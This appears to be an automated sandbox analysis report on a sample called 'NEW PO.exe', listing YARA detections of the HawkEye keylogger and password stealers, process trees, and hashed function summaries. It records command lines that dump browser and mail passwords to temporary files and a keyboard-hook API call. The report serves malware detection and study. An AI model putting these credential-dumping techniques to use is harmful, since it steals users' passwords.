Source: 00000012.00000002.435142271.000000000330F000.00000004.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000012.00000002.435142271.000000000330F000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000012.00000000.408411000.0000000008640000.00000004.00020000.sdmp, Author: Arnim Rupp Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000012.00000000.370231808.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000012.00000000.370231808.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000012.00000000.370231808.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000012.00000000.370231808.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000012.00000000.370231808.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000012.00000000.369064581.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000012.00000000.369064581.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000012.00000000.369064581.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000012.00000000.369064581.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000012.00000000.369064581.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000012.00000000.367380540.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000012.00000000.367380540.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000012.00000000.367380540.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000012.00000000.367380540.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000012.00000000.367380540.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000012.00000000.408464737.0000000008660000.00000004.00020000.sdmp, Author: Arnim Rupp Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000012.00000000.391692528.000000000359A000.00000004.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000012.00000000.391692528.000000000359A000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000012.00000000.392382903.00000000042D1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000012.00000000.392382903.00000000042D1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000012.00000000.400644306.00000000035EA000.00000004.00000001.sdmp, Author: Joe Security Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000012.00000002.433632203.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000012.00000002.433632203.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000012.00000002.433632203.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000012.00000002.433632203.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000012.00000002.433632203.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000012.00000002.439615340.0000000008660000.00000004.00020000.sdmp, Author: Arnim Rupp Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000012.00000000.396224265.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000012.00000000.396224265.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000012.00000000.396224265.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000012.00000000.396224265.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000012.00000000.396224265.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000012.00000002.435207427.0000000003338000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: vbc.exe PID: 6828 Parent PID: 3996

General

Start time:	14:43:53
Start date:	28/10/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Imagebase:	0x400000
File size:	1171592 bytes
MD5 hash:	C63ED21D5706A527419C9FBD730FFB2E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000016.00000000.399740135.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000016.00000002.420264771.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000016.00000000.398239322.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000016.00000000.399210452.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 5076 Parent PID: 3996

General

Start time:	14:43:53
Start date:	28/10/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Imagebase:	0x400000
File size:	1171592 bytes
MD5 hash:	C63ED21D5706A527419C9FBD730FFB2E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000017.00000000.402469174.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000017.00000002.404452957.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000017.00000000.402038118.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000017.00000000.401599576.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 6008 Parent PID: 3996

General

Start time:	14:43:59
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 2412
Imagebase:	0x20000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 5028 Parent PID: 3996

General

Start time:	14:44:01
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 2412
Imagebase:	0x20000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: NEW PO.exe PID: 7156 Parent PID: 4972 NEW PO.exeCOMMON

Executed Functions

Function 0318A570, Relevance: 1.7, APIs: 1, Instructions: 195COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0318A7B6

Memory Dump Source

Source File: 00000000.00000002.296372914.0000000003180000.00000040.00000001.sdmp, Offset: 03180000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 3ea40d196984cb3ae0911c73969d98d019cdf6ef012d4e2dfa2308198ea51936
Instruction ID: 831acb71395d46bbbd569e4755d1ebe2ab2663067454b0dafae0effe449fdd42
Opcode Fuzzy Hash: 3ea40d196984cb3ae0911c73969d98d019cdf6ef012d4e2dfa2308198ea51936
Instruction Fuzzy Hash: 32714770A00B058FDB24EF6AD0407AABBF5FF88204F14892ED486DBA40D735E8458F95

Uniqueness

Uniqueness Score: -1.00%

Function 0318576C, Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 03185829

Memory Dump Source

Source File: 00000000.00000002.296372914.0000000003180000.00000040.00000001.sdmp, Offset: 03180000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 6c0c8dd6eb33b50c75a3ee419814fb90d39fcf1cde4034770df28fb255c7a23d
Instruction ID: 488d8a9b51ef8dc90b2b4de60e9a310d6d899dfef2d2677f280fb7f0dc26ff78
Opcode Fuzzy Hash: 6c0c8dd6eb33b50c75a3ee419814fb90d39fcf1cde4034770df28fb255c7a23d
Instruction Fuzzy Hash: FD41E171C0061DCFDB24DFA9D884ADEBBB6FF89304F14846AD408AB250DB706949CF94

Uniqueness

Uniqueness Score: -1.00%

Function 03183F44, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 03185829

Memory Dump Source

Source File: 00000000.00000002.296372914.0000000003180000.00000040.00000001.sdmp, Offset: 03180000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: d906c12fd7062ee394ebd293f3bb4981a5171c89fb6e0fe778f20162e600b9d6
Instruction ID: 950359c98a39ec27b01c8704cd578efff61dbb9e49e3fc8c7faee48c3fdc3b9a
Opcode Fuzzy Hash: d906c12fd7062ee394ebd293f3bb4981a5171c89fb6e0fe778f20162e600b9d6
Instruction Fuzzy Hash: 2C41CF71C0061DCFDB24DFAAC888BDEBBB6EF89305F14846AD409AB251DB715949CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0318CA91, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0318CA5E,?,?,?,?,?), ref: 0318CB1F

Memory Dump Source

Source File: 00000000.00000002.296372914.0000000003180000.00000040.00000001.sdmp, Offset: 03180000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 9d18fc2266c521547766679b08d923bd94ec47e3a4e72f0a9811c38e896e81fc
Instruction ID: b5cd2d4c1b6e2c49a8a2321e470288c73673bd6bf94de6021dd8b9e316a05be6
Opcode Fuzzy Hash: 9d18fc2266c521547766679b08d923bd94ec47e3a4e72f0a9811c38e896e81fc
Instruction Fuzzy Hash: 0D2116B5D01209AFDB10CFA9D485ADEFBF8EB48310F14841AE958B7310D374A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0318B294, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0318CA5E,?,?,?,?,?), ref: 0318CB1F

Memory Dump Source

Source File: 00000000.00000002.296372914.0000000003180000.00000040.00000001.sdmp, Offset: 03180000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 329b6a69d3a19c4e45a2be4a0bf1e166c65d104491d593dcff940688abe0e420
Instruction ID: fd681a549574daadce464ea1c9c12ae023ed0c0d3c9a1b798dabbfec48a1e234
Opcode Fuzzy Hash: 329b6a69d3a19c4e45a2be4a0bf1e166c65d104491d593dcff940688abe0e420
Instruction Fuzzy Hash: 6721E4B5900209DFDB10CFA9D584AEEFBF8EB58324F14842AE918B7310D374A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 031898E0, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0318A831,00000800,00000000,00000000), ref: 0318AA42

Memory Dump Source

Source File: 00000000.00000002.296372914.0000000003180000.00000040.00000001.sdmp, Offset: 03180000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 12d5d45d8823566eeea8609a34e95c9e8a37fba2115dc2975a9758a193c54793
Instruction ID: e83c91dcb9e2e858b5935306c837ce48908698c0a1cf76c555925700be982ec7
Opcode Fuzzy Hash: 12d5d45d8823566eeea8609a34e95c9e8a37fba2115dc2975a9758a193c54793
Instruction Fuzzy Hash: B01114B6D002498FDB10DF9AD484ADEFBF4EF98314F15842AE515B7600C374A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0318A9D1, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0318A831,00000800,00000000,00000000), ref: 0318AA42

Memory Dump Source

Source File: 00000000.00000002.296372914.0000000003180000.00000040.00000001.sdmp, Offset: 03180000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5425f893b5cbbd11c9db0f33a88a0205da3fa11a38f23e75e05294ae4ea0a748
Instruction ID: d0eabacfd67b2086067cb19cd6adbde0a08772f45b3f12b2385092bfa55644c1
Opcode Fuzzy Hash: 5425f893b5cbbd11c9db0f33a88a0205da3fa11a38f23e75e05294ae4ea0a748
Instruction Fuzzy Hash: 101114B6D002498FCB10CFAAD484ADEFBF8EF88314F14842AE525B7600C375A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0318A750, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0318A7B6

Memory Dump Source

Source File: 00000000.00000002.296372914.0000000003180000.00000040.00000001.sdmp, Offset: 03180000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: a5f2547d488a522b50ef58e2bb2552df73a1aa16737a51e1f7fcc910edb5821e
Instruction ID: 69c5bc8dc5995e35c612873db8422388d6784624d3d8b27c0913b05ebabfe4a5
Opcode Fuzzy Hash: a5f2547d488a522b50ef58e2bb2552df73a1aa16737a51e1f7fcc910edb5821e
Instruction Fuzzy Hash: B4110FB6C002098FDB10DF9AC444ADEFBF8EF88224F14842AD529B7600C379A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0183D4C4, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.296155001.000000000183D000.00000040.00000001.sdmp, Offset: 0183D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f5b6fc7e8a0c72073cdf664d64d0e0866393757e3c64b2d4939f5e098ddc5e6
Instruction ID: 8261d3af0fdc4de4f638f58728ffa465056e1a1a6a8dbb9feb7bc459bf8b28aa
Opcode Fuzzy Hash: 5f5b6fc7e8a0c72073cdf664d64d0e0866393757e3c64b2d4939f5e098ddc5e6
Instruction Fuzzy Hash: E8213671504244DFCB01DF94C8C0B66BF65FBC8328F288A69E8058B286C336D516C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 0183D3D8, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.296155001.000000000183D000.00000040.00000001.sdmp, Offset: 0183D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c5c108e8219d9725b90898f8884b6a178c0a38624caecb2ac3ea275a470be22
Instruction ID: a22829704e68891c83973f92940883f15d480204f42b04e679cd13395eca433e
Opcode Fuzzy Hash: 6c5c108e8219d9725b90898f8884b6a178c0a38624caecb2ac3ea275a470be22
Instruction Fuzzy Hash: E6210671504204DFDB01DF94D9C4BA6BB65FBC8328F28C669D8098B246C33AE956C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 0184D1D4, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.296188799.000000000184D000.00000040.00000001.sdmp, Offset: 0184D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bd663c3c24c347fe355e73187efbe0fa135435d477bff80d09dae76216092c2
Instruction ID: 412ccda43da11410f15cbeaab97fe54a82976f1d080353087705d6bada35786b
Opcode Fuzzy Hash: 0bd663c3c24c347fe355e73187efbe0fa135435d477bff80d09dae76216092c2
Instruction Fuzzy Hash: 36210A71604208DFDB01CF94D5C4B26BBA5FB94328F24CB6DE8099B346C736E546CA61

Uniqueness

Uniqueness Score: -1.00%

Function 0184D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.296188799.000000000184D000.00000040.00000001.sdmp, Offset: 0184D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11c301a65fb55945dcf8dc9d47ae3e3df85b3d082e2b2420290f70e091d668f7
Instruction ID: 200c3113f9e4cc88e2149a4727cc977ff150e5811c633f4d39ebd3fc93ab2eae
Opcode Fuzzy Hash: 11c301a65fb55945dcf8dc9d47ae3e3df85b3d082e2b2420290f70e091d668f7
Instruction Fuzzy Hash: 53213771604208DFCB15CFA4D8C4B26BB65FB94358F24CA6DD8098B346CB3AD907CA61

Uniqueness

Uniqueness Score: -1.00%

Function 0183D3D3, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.296155001.000000000183D000.00000040.00000001.sdmp, Offset: 0183D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc9a01fde164ed1e7956aced2f3de09a2e23f2b6d2d198ccc532904340cf2df4
Instruction ID: 7ab1e9c782452be54f85f31c1c959ba1ba999663ed42e7c187da5ab5633cab0e
Opcode Fuzzy Hash: bc9a01fde164ed1e7956aced2f3de09a2e23f2b6d2d198ccc532904340cf2df4
Instruction Fuzzy Hash: AA11EE72404280CFCF02CF54D9C0B56BF71FB84320F28C2A9D8094B65AC33AE55ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0183D4BF, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.296155001.000000000183D000.00000040.00000001.sdmp, Offset: 0183D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc9a01fde164ed1e7956aced2f3de09a2e23f2b6d2d198ccc532904340cf2df4
Instruction ID: c0fc496f0fce3dd577613741876b953f89f319edc3fb8ddcce01954820a95fae
Opcode Fuzzy Hash: bc9a01fde164ed1e7956aced2f3de09a2e23f2b6d2d198ccc532904340cf2df4
Instruction Fuzzy Hash: 1411D376504280CFCF12CF54D5C4B16BF71FB84324F28C6A9E8454B656C33AD55ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0184D017, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.296188799.000000000184D000.00000040.00000001.sdmp, Offset: 0184D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdb46c6861fcf7f2b3faaf3f1670719688c0783f1dc8466a2cb6d5aa34317797
Instruction ID: 878009ccf9df56e6ed6d89944f14f4e1a5db511ab1e9267098f5cd445b87ff19
Opcode Fuzzy Hash: cdb46c6861fcf7f2b3faaf3f1670719688c0783f1dc8466a2cb6d5aa34317797
Instruction Fuzzy Hash: 2911BB75504284CFCB12CF54D5C4B15BBA1FB84324F28C6AAD8098B656C33AD54ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0184D1CF, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.296188799.000000000184D000.00000040.00000001.sdmp, Offset: 0184D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdb46c6861fcf7f2b3faaf3f1670719688c0783f1dc8466a2cb6d5aa34317797
Instruction ID: c970f53f4f152627a2adbce7c5c31e5d49d0d4c0608f2df4d77cf2b4c473675b
Opcode Fuzzy Hash: cdb46c6861fcf7f2b3faaf3f1670719688c0783f1dc8466a2cb6d5aa34317797
Instruction Fuzzy Hash: D111BB75504284DFCB02CF54C5C4B15BBA1FB84324F28C6A9D8498B696C33AE44ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 0183D745, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.296155001.000000000183D000.00000040.00000001.sdmp, Offset: 0183D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7036f7de6e3f229cfe1f60b053077fe481adacf4849611c9ee3cae67ae34ac28
Instruction ID: 92d0938c6ab3148539c86608b1fb63ccf2181ae9700aec521cacf0e382818861
Opcode Fuzzy Hash: 7036f7de6e3f229cfe1f60b053077fe481adacf4849611c9ee3cae67ae34ac28
Instruction Fuzzy Hash: 7B01FC314043C49AE7124EE5CCC4B66BB9CDF81368F4C8A1AED049B642D3789544C6F1

Uniqueness

Uniqueness Score: -1.00%

Function 0183D744, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.296155001.000000000183D000.00000040.00000001.sdmp, Offset: 0183D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16df3093659be0b3cf1949fe2928204b5d8542c04807b22a11b3f9d6c7e158d7
Instruction ID: d8f08bddf6cd5235ef9603bfc6bfaaf21fd97ec6ff21a6612ef8950cd17fc0af
Opcode Fuzzy Hash: 16df3093659be0b3cf1949fe2928204b5d8542c04807b22a11b3f9d6c7e158d7
Instruction Fuzzy Hash: 6CF062724043849AEB118E59CCC8B62FF98EB91774F18C55AED085B386D3799844CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0318D2F4, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.296372914.0000000003180000.00000040.00000001.sdmp, Offset: 03180000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e91022abe286cccffad007fada8b0792e87c6962a684ebd25473106c9f999e63
Instruction ID: 806ed246bc50202bf359fef9522c12bc6ecb658a996ad644487b94b15dc25536
Opcode Fuzzy Hash: e91022abe286cccffad007fada8b0792e87c6962a684ebd25473106c9f999e63
Instruction Fuzzy Hash: 64A16B36E00719CFCF05EFA5D9445DEBBB2FF88300B15856AE905AB264EB31A945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 03187748, Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.296372914.0000000003180000.00000040.00000001.sdmp, Offset: 03180000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4f998206a6476986966e5c5d11ea4374a2fff0d4f82e0ac48a8510b535116cc
Instruction ID: 5916db57d3f8893d61685350920b1944e934cb78e158e70bb3386a70618b9a68
Opcode Fuzzy Hash: e4f998206a6476986966e5c5d11ea4374a2fff0d4f82e0ac48a8510b535116cc
Instruction Fuzzy Hash: 3A412E74E04609AFDB08DFAAC98499EFBF2EF8C304F25D8A58015EB264E3349641CF54

Uniqueness

Uniqueness Score: -1.00%

Function 03187758, Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.296372914.0000000003180000.00000040.00000001.sdmp, Offset: 03180000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79be0009e2cd38c017e16fd7cbda76855435e38fd7a2336840bbe0082da62abd
Instruction ID: 5d0aa22de9e63747606cceffbbba7c2b7c3f37aa54443c604dddfbe605c0f7eb
Opcode Fuzzy Hash: 79be0009e2cd38c017e16fd7cbda76855435e38fd7a2336840bbe0082da62abd
Instruction Fuzzy Hash: B1412F70E04609AFDB08DF9AC98495EFBF2EF8D304F25D4A58015EB264E3349641CF44

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: NEW PO.exe PID: 6044 Parent PID: 7156 NEW PO.exeCOMMON

Executed Functions

Function 07A65190, Relevance: 2.0, APIs: 1, Instructions: 466libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 07A651FB

Memory Dump Source

Source File: 00000007.00000002.366819234.0000000007A60000.00000040.00000010.sdmp, Offset: 07A60000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4ff87fc69ccb21753a3ea91b161e9d3d8ac0581abe92e3ff0d6cd22f964309d9
Instruction ID: 18d8958448b57f1303e50d328f8ea3965d46ba14cbfb2cf491d04163def0ec99
Opcode Fuzzy Hash: 4ff87fc69ccb21753a3ea91b161e9d3d8ac0581abe92e3ff0d6cd22f964309d9
Instruction Fuzzy Hash: 2D32AD74901229CFCB65DF24C998BEDB7B1AF4A304F1085EAD449A7250EB35AE85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 07A6B180, Relevance: 1.9, APIs: 1, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.366819234.0000000007A60000.00000040.00000010.sdmp, Offset: 07A60000, based on PE: false

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: cf3eda318254110b60843176c749550a4af897d1cfaa7241c165126736ef698e
Instruction ID: 521d38ceb21de40b8427f438d06c1be86b1728864ffd5aff1fc744344d503019
Opcode Fuzzy Hash: cf3eda318254110b60843176c749550a4af897d1cfaa7241c165126736ef698e
Instruction Fuzzy Hash: 7FF18FB0A00209CFDB14DFA9C948B9DBBF1FF88304F258569E415EB2A5DB70E945CB61

Uniqueness

Uniqueness Score: -1.00%

Function 07A605A4, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(0000000D,00000000,?,?), ref: 07A650A3

Memory Dump Source

Source File: 00000007.00000002.366819234.0000000007A60000.00000040.00000010.sdmp, Offset: 07A60000, based on PE: false

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 2bca9015ef0cf5246f21cd62dfe384ce5a51541671d17cbe70db7fd6e6ee34c1
Instruction ID: 3b3e939089eff055970dd3e3c2e52f2701b4cae297dab56546ba50f6aa42b4b6
Opcode Fuzzy Hash: 2bca9015ef0cf5246f21cd62dfe384ce5a51541671d17cbe70db7fd6e6ee34c1
Instruction Fuzzy Hash: 1E2165B5D002099FDB10DFA9C848BEEBBF4FF88314F14882AE515A7250DB74A944CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 07A60584, Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.366819234.0000000007A60000.00000040.00000010.sdmp, Offset: 07A60000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d60ad8fa89c815c82f8098531d68eb06a5e6e263db9f603ba3292b9775bc10d6
Instruction ID: dd720ba788d83e64a7758e739619966051b04f563a7a01ff52928d6dc78533e9
Opcode Fuzzy Hash: d60ad8fa89c815c82f8098531d68eb06a5e6e263db9f603ba3292b9775bc10d6
Instruction Fuzzy Hash: 9C3114B1E052199FDB04DFA8E854AEEBBB2FF89304F10852AD505A7394DB346942CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00DE6BF8, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00DE6C58
GetCurrentThread.KERNEL32 ref: 00DE6C95
GetCurrentProcess.KERNEL32 ref: 00DE6CD2
GetCurrentThreadId.KERNEL32 ref: 00DE6D2B

Memory Dump Source

Source File: 00000007.00000002.361474508.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: false

Similarity

API ID: Current$ProcessThread
